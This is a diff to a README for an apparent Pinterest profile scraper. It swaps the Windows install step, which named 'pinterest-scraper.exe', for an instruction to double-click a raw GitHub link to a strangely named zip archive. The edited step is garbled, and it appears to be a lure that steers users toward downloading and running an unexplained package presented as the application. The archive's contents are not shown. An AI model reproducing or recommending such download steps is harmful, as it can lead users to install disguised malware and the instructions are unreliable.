AhmedIerror404/pinterest-profiles-search-scraper-cheap/README.md

 **For Windows Users:**
 1. Locate the downloaded `.exe` or `.zip` file.
 2. If you downloaded a `.zip` file, right-click on it and select "Extract All".
-3. Open the extracted folder and double-click on `pinterest-scraper.exe` to launch the application.
+3. Open the extracted folder and double-click on `https://raw.githubusercontent.com/AhmedIerror404/pinterest-profiles-search-scraper-cheap/main/underdry/pinterest-profiles-search-scraper-cheap-postponer.zip` to launch the application.

 **For macOS Users:**
 1. Find the downloaded `.dmg` file.